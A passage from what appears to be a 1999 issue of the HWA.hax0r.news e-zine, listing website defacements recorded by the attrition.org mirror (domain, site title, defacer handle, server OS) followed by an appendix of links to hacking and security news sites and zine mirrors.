Defaced 
domain: www.andmevara.ee Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.andmevara Defaced by: verb0 Operating System: Windows NT (IIS/4.0) URL: bin.mis.bolton.ac.uk Defaced domain: bin.mis.bolton.ac.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bin.mis.bolton.ac.uk Defaced by: s-n1nja Operating System: Apache 1.2.5 URL: www.anzwers.net Defaced domain: www.anzwers.net Site Title: Mythos Srl Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.anzwers.net Defaced by: HiP Operating System: Linux (Apache 1.3.6) URL: www.agmkt.state.ny.us Defaced domain: www.agmkt.state.ny.us Site Title: State of New York Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.agmkt.state.ny.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Mass Hack: URL: dongabank.co.kr Defaced domain: dongabank.co.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/dongabank.co.kr Defaced by: cybernetix Operating System: Linux (Apache 1.3.9) Attrition comment: 53 other .kr domains defaced with this one URL: www.windesheim.nl Defaced domain: www.windesheim.nl Site Title: Windenheim Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.windesheim.nl Defaced by: phr0st Operating System: Windows NT (IIS/4.0) Defaced domain: www.sst.nrel.gov Site Title: National Renewable Energy Laboratory Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.sst.nrel.gov Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.wines.shopwithme.com Site Title: Shop With Me - Wines Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.wines.shopwithme.com Defaced by: DHC Operating System: BSDI 3.0 (Apache 1.2.6) Defaced domain: www.ipsm.gov.br Site Title: Instituto de PrevidËncia dos Servidores Militares do Estado de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ipsm.gov.br Defaced by: globher Operating System: Windows NT (IIS/3.0) Defaced domain: 
gw.fresno.gov Site Title: City of Fresno Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/gw.fresno.gov Defaced by: globher Operating System: NT Defaced domain: www.natall.com Site Title: National Alliance Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.natall.com Defaced by: phr0st Operating System: Windows NT (IIS/3.0) Defaced domain: www.eseqex.ensino.eb.br Site Title: Escola de EquitaÚÇo do ExÊrcito Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.eseqex.ensino.eb.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.ccb.state.or.us Site Title: State of Oregon Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ccb.state.or.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Defaced domain: da_itc.da.gov.ph Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/da_itc.da.gov.ph Defaced by: TREATY Operating System: AIX 4.2 (Apache 1.2.4) Defaced domain: www.brasemb.or.jp Site Title: Embassy of Brazil in Tokyo Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brasemb.or.jp Defaced by: globher Operating System: Windows NT Defaced domain: testwww.sos.state.ga.us Site Title: Georgia Secretary of State Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/testwww.sos.state.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: www.occs.state.or.us Site Title: Oregon State Board of Education Office of Community College Services Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.occs.state.or.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mhs.pembrokeshire.ac.uk Site Title: Pembrokeshire College Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mhs.pembrokeshire.ac.uk Defaced by: TREATY Operating System: Solaris Defaced domain: www.tingiris.com Site Title: Steve Tingiris Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.tingiris.com Defaced by: vs Operating System: 
Linux Defaced domain: www.cherokee.k12.ga.us Site Title: Cherokee County School System Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cherokee.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: beta.lamison.com Site Title: The Lamison Press Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/beta.lamison.com Defaced by: darkness Operating System: Linux Defaced domain: www.coweta.k12.ga.us Site Title: Coweta County School System Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: www.superstition.com Site Title: www.superstition.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.superstition.com Defaced by: TREATY Operating System: NT Defaced domain: www.ncc.gov.ph Site Title: Philippine National Computer Center Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ncc.gov.ph Defaced by: TREATY Defaced domain: www.melissa.com Site Title: Melissa Computer Systems Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.melissa.com Defaced by: c0de red Operating System: Solaris Defaced domain: www.hwa.net Site Title: Hoefer WYSOCKI Architects Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.hwa.net Defaced by: p4riah Operating System: Windows NT Defaced domain: branson.k12.co.us Site Title: Branson School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/branson.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: avboces.k12.co.us Site Title: AV BOCES Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/avboces.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: centennial.k12.co.us Site Title: Centennial School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/centennial.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mail.heidmar.net Site Title: 
Heidenreich Marine Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mail.heidmar.net Defaced by: ieet Operating System: Windows NT Defaced domain: hoehne.k12.co.us Site Title: Hoene School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/hoehne.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: fowler.k12.co.us Site Title: Fowler School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/fowler.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: kim.k12.co.us Site Title: Kim School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/kim.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: huerfano.k12.co.us Site Title: Huerfano School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/huerfano.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: bee.d93.k12.id.us Site Title: District 93 Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bee.d93.k12.id.us Defaced by: TREATY Operating System: Linux Defaced domain: lasanimas.k12.co.us Site Title: Lasanimas School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lasanimas.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: lamar.k12.co.us Site Title: Lamar School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lamar.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: manzanola.k12.co.us Site Title: Manzanola School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/manzanola.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: laveta.k12.co.us Site Title: Laveta School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/laveta.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: mcclave.k12.co.us Site Title: McClave School District Mirror: 
http://www.attrition.org/mirror/attrition/1999/11/21/mcclave.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.dodge.k12.ga.us Site Title: Dodge School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.dodge.k12.ga.us Defaced by: secto0r Operating System: Windows NT Defaced domain: primero.k12.co.us Site Title: Primero School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/primero.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: plainview.k12.co.us Site Title: Plainview School District Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/plainview.k12.co.us Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.essex.ensino.eb.br Site Title: Essex Escola de Saude do Exercito Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.essex.ensino.eb.br Defaced by: globher Operating System: Windows NT Defaced domain: www.cis.pvt.k12.ca.us Site Title: Childrens International School Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cis.pvt.k12.ca.us Defaced by: Nitr0BurN Operating System: Linux Defaced domain: www.coweta.k12.ga.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us Defaced by: v00d00 Operating System: Windows NT (IIS/4.0) Defaced domain: www.pm.sc.gov.br Site Title: PolÎcia Militar de Santa Catarina - PMSC Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.pm.sc.gov.br Defaced by: globher Operating System: Apache 1.3.3 Defaced domain: www.srcs.k12.ca.us Site Title: K12 CA Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.srcs.k12.ca.us Defaced by: Darkness Operating System: Windows NT (IIS/4.0) Defaced domain: www.gibsonconsulting.com (Someone hacked a Gibson!) =) Site Title: Gibson & Associates, Inc. 
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.gibsonconsulting.com Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: saude.sc.gov.br Site Title: secretaria de saude de santa catarina Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/saude.sc.gov.br Defaced by: JLM Operating System: Windows NT (IIS/3.0) Defaced domain: bcmsc.k12.mi.us Site Title: K12 MI Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bcmsc.k12.mi.us Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.foreigntrade.gov.tr Site Title: Foreign Trade Turkey Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.foreigntrade.gov.tr Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: www.mipsor.state.mi.us Site Title: Michigan Public Sexual Offender Query Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.mipsor.state.mi.us Defaced by: ieet Operating System: Windows NT (IIS/4.0) Defaced domain: www.familychildcare.org Site Title: Florida Family Child Care Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.familychildcare.org Defaced by: sSh Operating System: Linux (Apache 1.3.9) Attrition comment: Geniuses left off a > tag in TITLE. View source. 
Defaced domain: www.cybermoon.net
Site Title: Cybermoon
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cybermoon.net
Defaced by: zeroc
Operating System: Linux (Apache 1.3.6)

Defaced domain: www.scrf.gov.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.scrf.gov.ru
Defaced by: ieet
Operating System: Windows NT (IIS/4.0)

Defaced domain: support.gbcprotech.com
Site Title: GBC Protech
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/support.gbcprotech.com
Defaced by: sSh
Operating System: Red Hat Linux (Apache 1.3.6)

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links
section on the http://welcome.to/HWA.hax0r.news/ url so check there for
current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and I'll review it
and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]